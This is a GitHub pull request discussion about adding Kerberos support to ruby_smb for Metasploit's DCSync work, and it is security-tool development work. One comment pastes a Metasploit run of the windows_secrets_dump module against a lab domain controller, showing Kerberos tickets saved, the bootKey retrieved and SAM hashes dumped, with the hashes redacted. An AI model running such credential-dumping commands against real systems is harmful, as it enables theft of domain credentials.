Closed smashery closed 9 months ago
Thanks for the review @cdelafuente-r7. Agreed regarding having the Kerberos functionality available here. I wonder whether it would be worth a refactoring job to pull it out into either here, or a separate repo? I think I've addressed the comments - let me know if there's anything else needed.
Thanks for updating this @smashery! Everything looks good to me now. I retested and confirmed the signature verification issue is fixed now. Adding Kerberos functionality would be great, but it would require a lot of refactoring and changes. I think your solution is the best for now. That being said, I'll keep this idea in mind for a future enhancement.
@cdelafuente-r7 I opened a PR implementing the changes you requested here: https://github.com/smashery/ruby_smb/pull/1. Give it a look and let me know what you think.
Tested this with the Metasploit side of things and it's all looking good to me now!
Thanks for your work on this Smashery, this is a great improvement!
msf6 auxiliary(gather/windows_secrets_dump) > run DOMAIN=msflab.local SMB::Auth=kerberos SMB::Rhostname=dc.msflab.local DomainControllerRhost=192.168.159.10
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_191490.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_964676.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes
[*] 192.168.159.10:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.10:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
... cut because secrets
This PR supports the kerberos-in-DCSync work in the Metasploit repo (see: https://github.com/rapid7/metasploit-framework/pull/18419). Test cases are listed in that PR, and should exercise all of the changes in this PR.